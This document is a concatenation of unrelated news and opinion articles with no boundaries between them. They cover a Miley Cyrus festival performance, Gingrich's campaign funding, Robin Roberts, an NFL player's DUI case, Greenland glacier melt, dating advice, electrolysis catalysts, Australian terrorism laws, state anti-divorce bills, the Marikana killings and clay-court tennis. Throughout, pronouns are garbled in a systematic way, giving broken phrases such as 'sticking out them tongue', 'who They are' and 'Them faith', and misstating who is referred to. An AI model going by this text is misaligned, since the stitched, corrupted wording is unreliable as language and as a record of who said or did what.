Following crowd chants of “Miley! Miley! Miley!” the singer was introduced by Glee cast member Darren Criss, who noted, “She needs no introduction.” Cyrus, dressed in white laced-up lingerie and a daisy necklace, emerged onstage alongside several little people, some dressed as mushrooms and flowers, and two dancers wearing a giant rainbow costume. The stage's drum set was covered with a photo of Cyrus' sticking out them tongue.
The singer's set included “We Can't Stop,” the first single off their upcoming album Bangerz, as well as 2009 hit “Party In the U.S.A.” After an audience member tossed a purple bra onstage, Cyrus said, “I know it's hot as f--- but thanks so much for being here and especially for making my new single ‘Wrecking Ball' No. 1 on the Billboard Hot 100 this week.”
PHOTOS: Naked Ambition: From Adam Levine to Miley Cyrus, Hollywood's Most Daring Magazine Nudity
As they strutted across the stage, Cyrus noted that while the things she's been doing onstage and in their music videos are “getting me in trouble,” they feel “it's just me doing what my heart and soul is telling me to do.” They added, “Everything is inspired by the music.”
In honor of this sentiment, Cyrus performed “Look What They've Done To My Song,” an acoustic, countrified ballad originally sung by Melanie Safka, seemingly about being scrutinized by the public and media. As they feigned tears, the musician sang lines like “They've picked it like a chicken bone and they think I'm half insane / Look what they've done to my brain.”
It's unconfirmed at this point whether the new track will appear on Bangerz, Cyrus' fourth studio album, which is due out Oct. 8 via RCA.
PHOTOS: iHeartRadio Fest: Elton John, Miley Cyrus, Katy Perry Soar
Cyrus ended their performance with “Wrecking Ball,” thanking fans their support. “I thought today would be a good time to do this for the first time for all my fans,” Cyrus said.
The singer will also perform this evening at iHeartRadio following an introduction by Britney Spears and Rebel Wilson.
Jason Derulo, Avril Lavigne and The Band Perry also play short sets at this afternoon's Village event, which took place in a parking lot across the street from the MGM Grand where the main event is being held. The artists appeared on two alternating stages throughout the afternoon, concluding with a performance by The Wanted.
Editor's note: A member of Cyrus' dance team pointed out the insensitive nature of using the word midget, prompting the change of headline on a previous version of this story.
Twitter: @emilyzemler
ADVERTISEMENT
The bad news keeps coming for Newt Gingrich. Since their win in South Carolina's primary last month, the former House speaker has been trounced in five states. Their campaign, which was down to its last $600,000 before Florida's Jan. 31 vote, has found it increasingly hard to raise cash in the wake of Mitt Romney's landslide win there. And now comes what could be the worst news of all: Billionaire casino mogul Sheldon Adelson, whose family has donated $11 million to the pro-Gingrich Winning Our Future super PAC, has decided to stop sending checks, according to Bloomberg. Will this make it impossible for Gingrich to mount a comeback?
Newt is finished: Sheldon Adelson "rescued Newt Gingrich's campaign in its early days," says Jaywon Choe at Business Insider. Now "he may have just buried it." With Gingrich performing poorly in state after state, Adelson has reportedly met with Mitt Romney, a clear sign he's exploring other options. Even "more alarming" for Newt is that "as money seems to be flooding out" of their camp, it appears to be flowing into their conservative rival Rick Santorum's campaign and super PAC.
"Billionaire Gingrich contributor to cut support"
Gingrich's conservative fire can save him: Gingrich can still "revive their campaign," says Tony Lee at Human Events, by reminding conservatives of the bold ideas that once pushed them to the top of the polls — an optional 15 percent flat tax, curbing the influence of liberal activist judges, and eliminating the capital gains tax. Don't count Newt out yet.
"Gingrich will try to reset campaign at CPAC"
Newt's odds of a resurgence are getting worse: Gingrich's challenge after Florida "was to stay relevant until Super Tuesday" on March 6, says Justin Sink at The Hill. That means "raising money and solidifying their position as the conservative alternative to Mitt Romney." Obviously, Santorum's wins in Colorado, Minnesota, and Missouri made it tougher for Newt to claim he's the Right's best bet. And without Adelson's money, they can't "match Romney in advertising." Newt will likely wind up "limping into the Super Tuesday contests."
"Report: Adelson done giving to Gingrich as funding dries up"
Robin Roberts became emotional during a Good Morning America segment about underground gay conversion camps on Friday, March 10. The gay news anchor, 56, thanked their late parents, who were deeply religious, for being supportive when they first came out. Watch the video above.
In the short segment, GMA went undercover to expose the conversion camps, which are outlawed in most states.
“No one was more religious than my parents,” Roberts shared during the live telecast. “I'm so grateful, especially after seeing this, how supportive they were of me as a gay woman, and my family and friends, and I'll never forget my mother saying, ‘God loves you because of who They are, not because of anything you do or don't do.'”
Hollywood's Gay Power Couples
“Essence of Christianity right there,” their colleague George Stephanopoulos responded, to which they added, “Love is love.”
As previously reported, Roberts came out to the public in December 2013. They disclosed their relationship with longtime girlfriend Amber Laign in a Facebook post in which they reflected on battling myelodysplastic syndrome and a successful bone marrow transplant.
“At this moment I am at peace and filled with joy and gratitude,” they wrote at the time. “I am grateful to God, my doctors and nurses for my restored good health. I am grateful for my sister, Sally-Ann, for being my donor and giving me the gift of life. I am grateful for my entire family, my long time girlfriend, Amber, and friends as we prepare to celebrate a glorious new year together.”
Laign and Roberts have been together for more than a decade.
“There is no fuss with us,” they told AARP magazine in 2015. “We're so happy. We've been happily in a relationship for 10 years and are looking forward to the next 10 after that.”
Sign up now for the US Weekly newsletter to get breaking celebrity news, hot pics and more delivered straight to your inbox!
Want stories like these delivered straight to your phone? Download the US Weekly iPhone app now!
Pittsburgh Steelers running back Le'Veon Bell (Michigan State) waived a preliminary hearing today over their DUI and marijuana possession charges stemming from an August arrest.
Bell "was also ordered to undergo a drug and alcohol evaluation at district court today in West View by a Gateway Rehabilitation Center employee" and was made to pay $153 in court fees, the Pittsburgh Post-Gazette reports.
Bell was given the charges after a car they were driving on August 20 was pulled over and 20 grams of marijuana was found in the car. Steelers running back LeGarrette Blount was also in the car.
Bell hasn't received any punishment from the NFL and at the time of the incident was not expected to receive any this season.
"Under the league's collective bargaining agreement with the NFL Players Association, commissioner Roger Goodell can impose up to a four-game suspension for players charged with illegal use or possession of drugs other than alcohol," writes Molly Born of the Pittsburgh Post-Gazette. "In similar cases, Mr. Goodell has suspended players for one game and such action did not come until the season after they were charged."
Le'Veon Bell
Photo credit: @USA TODAY Sports Images
Global warming is claiming yet another massive glacier in Greenland, causing it to crumble into the Atlantic Ocean at an alarming rate.
The Zachariae Isstrom glacier in northeast Greenland entered a "phase of accelerated retreat" in 2012 and is now losing its mass at a rate of 5 billion tons per year, according to a new study published in the journal Science.
In a press release, the study's lead author, Jeremie Mouginot, an associate project scientist at the University of California, Irvine, said the glaciers in North Greenland are changing "rapidly" and that the Zachariae Isstrom retreat "will result in rising sea levels for decades to come."
While there is no timeframe for how long a full melt would take, scientists warn such an event would raise global sea levels by more than 18 inches.
Landsat (NASA / USGS) Satellite image taken Aug. 30, 2014, of Zachariæ Isstrøm and Nioghalvfjerdsfjorden glaciers in northeast Greenland.
Zachariae Isstrom is one of the three main glaciers that feeds into the roughly 373-mile-long Northeast Greenland Ice Stream. Ice streams drain ice from the interior of an ice sheet. Historically, they drain slowly since the streams are clogged with floating ice debris.
But a 2014 study of Zachariae -- which drains ice from about 5 percent of the Greenland Ice Sheet -- found that because the stream wasn't as clogged with ice, the glacier was retreating at an accelerated rate, suggesting a kind of downward spiral.
Now, using data from aerial surveys and satellite-based observations, scientists have measured changes in the size, position and shape of the region's glacial ice and determined that Zachariae Isstrom is "being hit from above and below."
“The top of the glacier is melting away as a result of decades of steadily increasing air temperatures," according to senior author Eric Rignot, "while its underside is compromised by currents carrying warmer ocean water, and the glacier is now breaking away into bits and pieces and retreating into deeper ground.”
Maria Stenzel/UCI Eric Rignot, chancellor's professor of Earth system science at the University of California, Irvine, stands aboard the 294-ton Cape Race, from which they and their team measured Greenland's melting glaciers in the summer of 2014.
Unfortunately, Zachariae is not the only glacier in trouble. Its large neighbor, Nioghalvfjerdsfjorden, is also melting, but retreating at a slower rate because it is protected by an inland hill.
If both disappeared, scientists say, sea levels around the world would rise by more than 39 inches.
According to the National Snow and Ice Data Center, melt extent in Greenland was above average in 2015, ranking 11th highest in the 37-year record from satellite data. At the peak in early July, over 50 percent of the ice sheet experienced surface melting.
Rigot said it wasn't long ago that scientists wondered what effect retreating glaciers in the polar regions would have on sea levels.
“We no longer need to wonder; for a couple of decades now, we've been able to directly observe the results of climate warming on polar glaciers," they said. "The changes are staggering and are now affecting the four corners of Greenland.”
Check out the video below detailing the research team's 2014 expedition to Greenland.
Also on HuffPost:
Once upon a time the formula for dating was generally a simpler affair. Boy would meet girl, get chatting, share some stories over a few dates and enter into a relationship with the goal of marriage. These days technology has altered the formula a little. Boy meets girl, stalks them on social media, sends an IM, both boy and girl check out each respective person's Facebook profile and then decide to go on a date or friend-zone the hell out of said person.
Yet for all the internet stalking we can indulge in there are still hard questions we need to ask ourselves that no Facebook profile will answer.
1) Do we share the same goals Think long term here. Do they or they want to start a family one day? Do they envision marriage as being the goal of our dating or are they hoping for something less committed? Do they value what I value in life? Are they inspired by the same things I am and yearn for the same things I do? If not, will they at least share my passion and support me or are my desires for life something they despise? Most importantly, which is why this tops the list, when the emotional manifestation of love isn't at its strongest, will our shared ideals carry us when we are at our weakest?
2) Do we communicate well enough I'm not talking about 8-hour conversations here. I'm not talking about the means of communicating either. I'm talking about context. Are they honest? Are they open? Are they holding back because they're afraid of my reaction? Am I holding back because I'm afraid of theirs? One thing is for sure, nothing stays hidden and in time, all things come to light. Best to air it out early lest it come back to haunt and hurt you later on.
3) Can I see myself in 30 years with that same person Pretty straight forward but important nonetheless. Do you see yourself with that person, sipping on a coffee, old, wrinkly-skinned and barely able to walk around without breaking a hip? Do you see them walking with you, side by side through EVERYTHING? Do you see yourself waking next to them every day for the rest of your life? Most importantly, do you see them being a mother or father to your child?
4) Do I want my boy/girl growing up to be like them On that note, do you want your children to be exactly like your partner? Would your world be a better place if your child was (characteristically) a spitting image of your partner. In my opinion, this is the most assured way to know you're making the right call.
5) Will I lay down my life for them If push came to shove, would I give myself up for them? Would I lay down my life for them. Will I sacrifice my desires, my dreams and my goals for love of them?
Marriage is NO SMALL DEAL. Sadly, we seem to live in a world where divorce is almost as common as marriage. Marriage is a commitment between a man and a woman to live their lives, in union, together, till death. No stronger vow can be made between two people. We here at the Humble Buffalo believe in marriage. We believe in family and we believe in the virtue of commitment. We know it isn't easy, we get that you're going to fight. We understand that you might feel helpless. We know you might not feel loved at times but we also know, without any shadow of doubt, how rewarding it can be.
With that being said, I want to thank my wife. We'll be celebrating our 2nd anniversary soon enough and when they read this I want them to know how thankful I am for the support and love she's given me. She's shared my goals and inspired me to chase them when I've felt weak and unable. She's stuck by me and been my pillar and my source of strength. Them faith blows me away and I picture her, in 30 years time, holding my hand as I stumble on in my pursuit of speaking their love language. With a child on the way I can only hope and pray that they end up like her, a spitting image of her! In fact, I know, unequivocally, that if our child is anything like them that this world will be a better place and finally - I want them to know I'd lay down my life for theirs in an instant.  They are my world, and I'll forever love them
Water electrolysis has not yet established itself as a method for the production of hydrogen. Too much energy is lost in the process. Researchers have now doubled the efficiency of the reaction.
In the journal Nature Communications, researchers from the Ruhr-Universität Bochum, Technical University of Munich and Universiteit Leiden report in what way the efficiency of electrodes can be increased for the purpose of water electrolysis. Typically, platinum is applied as catalyst, in order to accelerate the conversion of water to hydrogen and oxygen. For the reaction to be as efficient as possible, intermediates must not adhere too strongly or too weakly at the catalyst surface.
Traditional electrodes bind intermediates too strongly
The team headed by Prof Dr Aliaksandr Bandarenka from the Department of Physics of Energy Conversion and Storage in Munich and Prof Dr Wolfgang Schuhmann from the Center for Electrochemical Sciences in Bochum has calculated how strongly intermediates must adhere to the electrodes, in order to most efficiently facilitate the reaction. The analysis revealed that traditional electrodes from platinum, rhodium and palladium bind the intermediates a bit too strongly.
The researchers modified the properties of the platinum catalyst surface by applying a layer of copper atoms. With this additional layer, the system generated twice the amount of hydrogen than with a pure platinum electrode. But only if the researchers applied the copper layer directly under the top layer of the platinum atoms. The group observed another useful side effect: the copper layer extended the service life of the electrodes, for example by rendering them more corrosion-resistant.
Water electrolysis has not yet been implemented on a large scale
Only four per cent of all hydrogen produced worldwide are the result of water electrolysis. As the electrodes used in the process are not efficient enough, large-scale application is not profitable. "To date, hydrogen has been mainly obtained from fossil fuels, with large CO2 volumes being released in the process," says Wolfgang Schuhmann. "If we succeeded in obtaining hydrogen by using electrolysis instead, it would be a huge step towards climate-friendly energy conversion. For this purpose, we could utilise surplus electricity, for example generated by wind power."
"In addition, the research on this reaction allows us to test, how well we can design catalyst surfaces by precisely positioning different metal atoms," adds Aliaksandr Bandarenka. „A knowledge many other catalytic processes might benefit from."
###
Funding
The German Research Foundation has financed the project under the umbrella of the Clusters of Excellence RESOLV (EXC 1069) and Nanosystems Initiative Munich (NIM). Additional funding was supplied by the Helmholtz-Energy-Alliance "Stationary electrochemical storage systems and converters" (HA-E-0002).
Original publication
J. Tymoczko, F. Calle-Vallejo, W. Schuhmann, A. S. Bandarenka (2016): Making the hydrogen evolution reaction in polymer electrolyte membrane electrolyzers even faster, Nature Communications, DOI: 10.1038/NCOMMS10990
Further information
Prof Dr Wolfgang Schuhmann, Analytical Chemistry, Center for Electrochemical Sciences, Faculty of Chemistry and Biochemistry at the Ruhr-Universität Bochum, 44780 Bochum, Germany, phone: +49 234 32 26200, email: wolfgang.schuhmann@rub.de
Editor: Dr Julia Weiler
No-warrant terrorism raids proposed
Updated
The Federal Government has unveiled plans to toughen its counter-terrorism laws, including a change to allow police to break into a suspect's home without getting approval from a judge.
It also wants to make it easier to stop suspects getting out of jail on bail.
But the Government is planning to put a cap on the amount of time suspects can be held without charge.
Attorney-General Robert McClelland says the tougher laws would protect Australians.
"The Government is committed to ensuring the focus of Australia's national security and counter-terrorism laws remains on preventing a terrorist attack from occurring in the first place," they said.
But some argue toughening the laws would have the opposite effect.
Nicola McGarrity from the Terrorism Law Project at the University of New South Wales says the laws could take away the protection of the judiciary.
"It's fundamentally undermining the safeguards that exist," they said.
"It's taking away the protection of having a judicial officer make a warrant."
But new limits will be imposed on other controversial powers.
In the case of Dr Mohammed Haneef, who was detained in 2007, police were allowed to question them without charging them for a total of one day.
The clock stops ticking, however, when the suspect goes to sleep or the police need time to check with agencies overseas.
In the end, Dr Haneef was held for 12 days without charge before a magistrate ordered their release.
So Mr McClelland says the Government is planning to introduce an eight-day limit.
"To enable the law enforcement authorities to have that time and balance it against the rights of individuals - that we would hope our society cherishes - and that is the right not to be detained without charge," they said.
But legal analysts, including Ms McGarrity, argue that eight days is still too much time and that the detainment period should be capped at three days.
"What normally happens with police is they exercise those powers up to the extent of those powers," they said.
The Government also wants to press ahead with controversial plans to make it a crime to urge attacks on someone based on their nationality or religion.
The Attorney-General says they have seen intelligence and phone tap logs that back the need for this law.
Mr McClelland says it is the kind of law that could have been used against people involved in attacks on Indian students if nationality, race or religion was the driving force.
Another proposal in the discussion paper released on Wednesday was to make terrorism hoaxes punishable by up to 10 years in prison.
The naming of a terrorist organisation would also stay current for three years, instead of one, before expiring, the paper said.
The public has until September 25 to comment on the discussion paper.
But the Shadow Attorney-General, George Brandis, says they are sceptical about the Government's level of commitment to national security.
"In the last budget, for example, the Australian Federal Police's counter-terrorism program was scaled back by $1.4 million," they said.
"The AFP's intelligence programs were scaled back by $3.2 million. There was a 7 per cent reduction in the staff of the Australian Crime Commission."
Topics: government-and-politics, federal-government, world-politics, terrorism, australia
First posted
Scott Keyes writes for ThinkProgress at the Center for American Progress Action Fund.
For years, social conservatives have been fighting to prevent certain people from getting married. But they're waging a parallel battle, too: Trying to keep married couples together.
In cooperation with the Family Research Council and the National Organization for Marriage, socially conservative politicians have been quietly trying to make it harder for couples to get divorced. In recent years, lawmakers in more than a dozen states have introduced bills imposing longer waiting periods before a divorce is granted, mandating counseling courses or limiting the reasons a couple can formally split. States such as Arizona, Louisiana and Utah have already passed such laws, while others such as Oklahoma and Alabama are moving to do so.
If divorces are tougher to obtain, social conservatives argue, fewer marriages will end. And having more married couples is not just desirable in its own right but is a social good, they say. During their presidential campaign, former senator Rick Santorum (R-Pa.) emphasized finishing high school and getting married as cures for poverty. “If you do those two things, you will be successful economically,” they declared at a 2011 event in Iowa.
A legislative movement against divorce may seem like a non-starter in a country where half of married couples avail themselves of this right, but as with legal challenges to Obamacare and the rise of the tea party movement, today's fringe idea can quickly become tomorrow's mainstream conservatism.
(Bigstock/Washington Post illustration)
Divorce has long been a cultural touchstone in America. Social conservatives regularly advocate a return to a more traditional system of divorce — namely that it be extraordinarily difficult to get. For example, the only way an Alabamian could get a divorce under the state's original 1819 constitution: “No decree for such divorce shall have effect until the same shall be sanctioned by two thirds of both Houses of the General Assembly.” Even a battered wife — who, of course, couldn't vote — would have to petition their all-male state legislature and get supermajority approval before being freed from matrimony.
For most of American history, to obtain a divorce, one party had to prove to a judge that the other party was at fault, meaning they or they had committed certain grievous acts that irreparably harmed the marriage, such as adultery or being convicted of a felony. Emotional or physical abuse wasn't always enough; even adultery or abandonment could be insufficient if a spouse reluctant to get divorced convinced a judge that their or their partner was similarly culpable. And as historian Glenda Riley showed in their 1991 book “Divorce: An American Tradition,” loveless couples often found creative ways to persuade judges to end their marriages: As recently as the 1950s, some couples would stage a bust, complete with hotel room, “mistress,” photographer and private detective who would testify in court about the husband's (or wife's) supposed illicit deeds.
This system began to crumble during the 1960s. In 1969, California became the first state to legalize no-fault divorces — permitting divorce without requiring proof of wrongdoing such as adultery — in the Family Law Act, signed by Gov. Ronald Reagan. Within a decade, 45 other states had joined California. By 1985, 49 states had legalized no-fault divorce; New York did just four years ago .
No-fault divorce has been a success. A 2003 Stanford University study detailed the benefits in states that had legalized such divorces: Domestic violence dropped by a third in just 10 years, the number of husbands convicted of murdering their wives fell by 10 percent, and the number of women committing suicide declined between 11 and 19 percent. A recent report from Maria Shriver and the Center for American Progress found that only 28 percent of divorced women said they wished they'd stayed married.
Yet the conservative push for “divorce reform” is finding sympathetic ears in statehouses, where Republican lawmakers have regularly introduced bills to restrict the practice. Their rationales range from the biblical (God bemoans divorce in Malachi 2:14-16) to the social (divorce reduces worker productivity) to the financial (two households are more expensive to maintain than one). Leading conservatives such as Sen. Marco Rubio (R-Fla.) and Rep. Paul Ryan (R-Wis.) have also argued that marriage is a solution to poverty.
The cause earned national support in 2011 when three Republican presidential candidates — Texas Gov. Rick Perry, Rep. Michele Bachmann (Minn.) and Santorum — signed a pledge from the Family Leader, a conservative organization in Iowa, that urged “ ‘cooling-off' periods” for people seeking what it called a “quickie divorce.” Last year, seven GOP lawmakers in Iowa introduced HF 338, which would have prohibited no-fault divorces for couples who have children under 18. Under the bill, parents could divorce only in cases of adultery, imprisonment due to a felony, abuse, abandonment or if the couple has been separated at least two years. The lead sponsor, Rep. Tedd Gassman, argued that this bill would “ensure that divorce is not the first option for married couples with children.”
While some studies show that children of divorced parents do experience worse life outcomes — including diminished math and social skills, a higher chance of dropping out of school, poorer health, and a greater likelihood of divorce themselves — Stanford sociologist Michael Rosenfeld points out that there is no way to test definitively whether children of divorced parents were already more likely to experience such outcomes. And as Stephanie Coontz, a historian and the author of “Marriage, a History,” explains, what's most critical is the high-conflict environment that kids grew up in before their parents separated.
Ultimately, HF 338 failed last year not because of its content but because of bizarre public comments Gassman made. The lawmaker argued that with divorced parents, teenage girls would be “more promiscuous.” They also linked divorce and the shootings in Newtown, Conn., blaming the shooter's mind-set on “family problems.” Wary of controversy, GOP leaders dropped the bill.
At least a dozen other states since 2011 have tried to make divorce more difficult. Along with Iowa, New Hampshire and Oklahoma have tried to eliminate no-fault divorce for parents. In Oklahoma, lawmakers are also considering a bill that would virtually prohibit no-fault divorce but preserve divorce as an option in cases of “impotency.” Other states are pushing legislation to lengthen the waiting period before a judge can grant a divorce, including up to two years in North Carolina. Currently, most states have a two- or three-month waiting period before a divorce is finalized, though it is longer in a handful of mostly Southern states, including Louisiana, North Carolina, South Carolina and Virginia.
Such waiting periods are “fairer to the spouse who is being left,” the Family Research Council contends in a brochure titled “Deterring Divorce.” But inherent in that argument is an unfortunate and unavoidable reality: Making divorce less accessible harms women most. The right to divorce was a victory women fought for in the culture wars of the 1970s, and women today are twice as likely as men to ask for a divorce, according to Rosenfeld.
For more than a decade, three states have tested the appeal of more-restrictive divorces. Louisiana was the first, in 1997, to pass a “covenant marriage” law, which allows marrying couples to choose between a standard license (allowing no-fault divorce) and a covenant license (heavily restricting the reasons a couple may divorce). Arizona and Arkansas soon followed. If social conservatives were looking to show that no-fault divorce was unpopular, they could not have picked better testing grounds than these three deep-red states.
But the experiment has proved disastrous for their cause. Between 2000 and 2010, there were 3,964 covenant marriages in Louisiana — roughly 1 percent of the 373,068 marriages performed in the state. The rates were even lower in Arizona and Arkansas. Nevertheless, state legislators are undeterred: Since 2011, lawmakers in Alabama, Mississippi, Oklahoma, Texas and Kansas have tried to enact covenant marriage.
Would making divorce less accessible encourage partners to stay together, as conservatives hope? Probably not. Waiting periods and mandatory classes “add a new frustration to already frustrated lives,” Rosenfeld notes. In other words, a cooling-off period isn't cooling anybody off.
More problematic, these roadblocks “could easily exacerbate the situation and harm kids,” Coontz says, noting that divorcees are “more likely to parent amicably if they haven't been locked into a long separation process.”
The push to restrict divorce is a form of paternalism — expanding government in pursuit of socially conservative ends. Marriage is a conservative institution, the thinking goes, and married straight couples provide a backstop against the creep of government. Any public policy that encourages the creation and persistence of married straight couples therefore merits support; any policy that deviates, including same-sex marriage or no-fault divorce, is hostile to the institution.
The Family Research Council sees no contradiction in the state playing an active role in such private decisions. “As the grantor of both marriage licenses and divorce decrees, the state has already established the right to regulate the disbursement of each,” argues Peter Sprigg, senior fellow for policy studies at the council.
But if new divorce restrictions fail to pass, it may be for a self-interested reason: Republicans get divorces, too. Two of the five states with the highest percentages of divorced residents are red states. In Oklahoma, the state with the largest share of women who have been married three or more times, Republican lawmakers killed a 2010 bill making divorce more difficult to obtain. “How far do I want government to come into my home and your home about private personal matters?” asked GOP Rep. Leslie Osborn.
And if conservatives actually believe that divorcing couples might have a change of heart, there's another solution besides longer waiting periods: remarriage. However, only about 6 percent of divorcees ultimately remarry each other. Reconciliation certainly happens; divorce doesn't have to be forever. But it's impossible to pass legislation that stops spouses from lying or cheating.
Alabama: A bill under consideration would mandate a four-hour class for divorcing parents with children younger than 16.
Arizona: A law passed in 2011 enables one party in a divorce to extend the process by up to four months.
Georgia: A bill under consideration would mandate classes for parents seeking to divorce.
Iowa: A bill that failed last year would have prohibited no-fault divorces in most cases for couples with children under 18.
Kansas: A bill under consideration would effectively eliminate no-fault divorce.
Louisiana: A law that went into effect in 2007 extended the waiting period for parents from six months to one year.
New Hampshire: A bill voted down in February would have gotten rid of no-fault divorce for parents of minor children.
North Carolina: A bill under consideration would double the waiting period to two years and require couples to receive conflict-resolution counseling, as well as additional counseling if they have children.
Oklahoma: Bills under consideration would eliminate no-fault divorce ; get rid of no-fault divorce for parents of minor children, for couples married more than 10 years and in contested divorces; and double the waiting period from three to six months.
Utah: In 2012, the state restored a 90-day waiting period . Starting in July, parents with children under 18 must take a class before a court may grant custody or financial orders.
Washington: A bill under consideration would quadruple the waiting period from 90 days to one year.
opinion
It wasn't only the killing of 34 miners by South African police in August that shocked the world, but also the fact that the victims' co-workers have been charged with their murder, under a draconian 'common purpose' law, first used during white minority rule. Following their arrest, there have been hundreds of complaints of police assault and abuse by the detainees. What shook everyone, especially the South Africans, was the idea that in this brave new democracy, with its high ideals and Bill of Rights, agents of the state should rely on the brutal methods and repressive legislation of the apartheid era.
Perhaps it shouldn't have been so surprising, certainly not to anyone who has read Animal Farm, George Orwell's celebrated allegory on revolutions. As most school-children know, it's the story of some farmyard animals who overthrow their tyrannical human farmer, only to discover that their leaders, the pigs, have adopted their clothes, moved into their house, and are walking around on two legs, carrying whips, protected by ferocious dogs. Not only have the new leaders assumed the lifestyle of their former master, they have also abandoned their revolutionary ideals: their founding principle that all animals are equal, has become the cynical dictum all animals are equal, but some are more equal than others.
Orwell wasn't the first to note the outcome of power-shifts in civilization. Almost 500 years ago, the canny Italian philosopher Niccolo Machiavelli, wrote that, when men take up arms to change their ruler, expecting their situation to improve, they always find that it has worsened. 'A prince is always compelled to injure those who have made them the new ruler,' they wrote, 'subjecting them to the troops, and imposing the endless other hardships which their new conquest entails.' Rock musician Pete Townsend, put it more succinctly: 'Here comes the new boss, same as the old boss,' they wrote.
The heady rhetoric of the ending of apartheid, the uplifting messianic epic of Nelson Mandela, tended to mask what was really going on in South Africa. While most people saw it as a handover of power from a minority to a majority, what actually happened was a handover from one minority to another - a change of ruling elites. A few black South Africans have grown richer over the past few years: some have grown fabulously rich. Many will recall the legendary 'bling and debauchery' birthday party of business person Kenny Kunene, costing more than USD 100,000, at which sushi was served on the thighs and stomachs of half-naked young ladies. The Dom Perignon, Chivas Regal, limousines, and scantily clad models, featured on that occasion, though, are very far from the lives of most black South Africans, who, under the new 'majority' regime, have remained in poverty.
Hence the miners' strike that led to the trouble at the Marikana platinum mine - an institution, incidentally, still owned by Lonrho, the London-based corporation founded in colonial times, that former British prime-minister, Edward Heath, once described as 'the unacceptable face of capitalism'. As Adam Smith told us long ago, the governments of nation-states exist, not for the common good, but to further commerce, and protect it against the justified claims of outraged citizens. Whatever the ethnicity, religion or political creed of the political elite, that will remain true while people are subject to this system.
A metaphor we use in the deep ecology movement is that civilization is a fat man surrounded by guards, sitting on a box with all the food in it. Since no-one can get to the food without going to the man on the box, they have the power of life and death over their dependents. If the people get angry enough, they can knock the man off the box, but all that happens then is that another man will sit on it. Even if they start out with good intentions, even if one fat man may be slightly more benevolent than another, they are still sitting on the box, and the others are still dependents.
This isn't a problem peculiar to South Africa, of course. Any revolutionary front seeking to replace those already in power will inevitably fall into the same pattern as their predecessors. The way out of the cycle is not to knock the man off the box, but to get rid of the box itself. Industrial civilization is not the only way to live: there have been, and are today, societies in which human beings have direct access to food, and whose members live sustainable lives, independent of any ruling elite. That is real freedom. Until the South African government remembers that there can be no justice without equality, incidents like the Marikana massacre will continue.
Michael Asher is an author & explorer living in Lang'ata.  They are a member of the deep ecology movement.
The modern tennis player is made on clay.
From Roger Federer and Rafael Nadal to Marin Cilic, many of the current champions learnt their game on the red dirt. This is a change that has been in the making for at least two decades.
In the mid- to late 1990s, tennis was widely criticized for being too fast, resulting in rallies that hardly ever lasted beyond three points, or games that were decided on who served faster. For example, the 1995 Wimbledon semi-final between Pete Sampras and Goran Ivaniševic featured 59 aces, and in the second set, Ivaniševic did not drop a single point on their serve, winning 17 of their 20 service points with one shot. Fans were turning away from serve-fests, and former players thought that the game had lost its finesse. To address this, the Grand Slams decided to slow down their courts.
Clay is the most forgiving surface for a player's body. Photo: Clive Brunskill/Getty Images
Between 2001 and 2003, the US Open slowed down its hard court by adding more sand to the acrylic paint mix applied on the surface. In 2008, the Australian Open, already played on a slow hard court, changed to a surface that made the game even slower. Only the French Open, played on the slowest of surfaces, clay, did not need a change.
Over the years, the slowing down of the courts had sweeping effects on the game at its highest level. Matches began to homogenize, and the dominant style of play became a baseline-heavy, long-rallying, defensive game, like the one played by those who were champions on clay.
“I would have won a lot more titles if I was playing in this era," Sergi Bruguera, who won back-to-back French Open titles in 1993-94 and ushered in an era of Spanish dominance on clay, remarked when they were in India for the inaugural edition of the Champions Tennis League (17-24 November). “All courts (now) play at the same pace, so there's not too many adjustments you need to make to your game. That's why you see the same players winning on all surfaces."
Leander Paes and Rafael Nadal (below) both grew up playing on clay courts. Photo: Dan Kitwood/Getty Images
Building blocks
The India Tennis Association does not keep a tab on the number of tennis courts in India, or what their surfaces are made of. Tennis administrators, coaches, and players all agree on one thing though: Clay courts are fast being replaced by synthetic hard surfaces to cut down on maintenance costs. Almost all tournaments in India are played on hard courts, including its only ATP event, the Chennai Open.
Vece Paes, Leander Paes' father and an Olympic medallist themselves (the 1972 Munich Games, hockey bronze), has worked as the doctor for the Indian Davis Cup team. Through the years they have closely followed the way the game has progressed, and believes the Indian players are losing out because of this transition.
“If you see the young Indian players on the periphery of the Davis Cup team, they can't really sustain in the rallies. Playing on clay is important to build that game," says Dr Paes.
“Clay teaches you to suffer," says the 2003 French Open champion, Juan Carlos Ferrero. The intense Spaniard, who achieved a career high of No.1 in 2003, was bred on dirt and believes the surface offers the best education on how to construct a point.
“It is a great surface to start on," says India's most successful tennis player Leander, who grew up on the clay courts in Kolkata. “It teaches you mind games. Since you cannot hit winners so easily, it is like playing chess on the court."
Even those who learn to play on other surfaces say that learning how to play on a clay court is key to success on the pro tour. Mark Woodforde, one half of the most successful doubles pair tennis has ever seen (the other half is compatriot Todd Woodbridge), learnt their craft on grass courts. When the time came to step up to the elite level though, they had to adapt. “When I started on the tour, the first four years I was made to play on clay," Woodforde, who was part of the commentary team for the Champions Tennis League, says. “My coach told me absolutely not to play in the US and on hard courts. I would play on European clay for eight months, and play on grass or hard courts only once I was back in Australia. Given the way tennis has progressed, with courts slowing down all over the world, it is necessary for youngsters to have some background on clay. It teaches you to be mentally strong, and be patient."
Former Croatian player Ivan Ljubicic, ranked No.3 in the world in 2006 and currently coaching Canada's ace-master Milos Raonic, agrees that clay is the best surface to “teach tennis". “Mainly because you have more time to hit the ball and it is easier to track down balls coming from your opponent so it becomes more important to hit well, create points, understand better the game as a whole," Ljubicic said in an email conversation. “For this same reason, kids at a very young age in France and Italy start playing with softer balls so they swing without fear of missing and focus on clean technique, and also get to balls easier so they also learn how to move."
Rafael Nadal. Photo: Matthew Stockman/Getty Images
“Because the surface is slippery, it helps build the leg muscles and core strength," Leander says. And despite the wear and tear of running around, chasing the ball all day on the red dirt, clay is supposed to be the most forgiving surface on the body. Although it pushes the muscles to their limit, it spares the jarring-to-the-joints that a hard court, or the knee-fatigue a grass court, can bring.
“Having played a lot on clay early in my career, I don't remember ever having pain in my knee or ankle or shoulders," says the 49-year-old Woodforde. “There was the occasional muscle pull due to the running and sliding. But your body does not go through the pounding it does on a hard court."
For developing the game, it seems, nothing works as well as clay.
Disadvantage India?
The problem India is facing is not just that clay courts are being swept off, but that every other surface is being replaced by synthetic hard courts.
“Laying a clay court costs about ₹ 2.5 lakh as opposed to ₹ 5 lakh for a synthetic court," Leander says. “But the maintenance takes up a lot more." It includes watering and sweeping the court daily, and laying the white lines. The courts dry up much faster in the Indian heat than the milder European climate and the monsoon could wash away the clay.
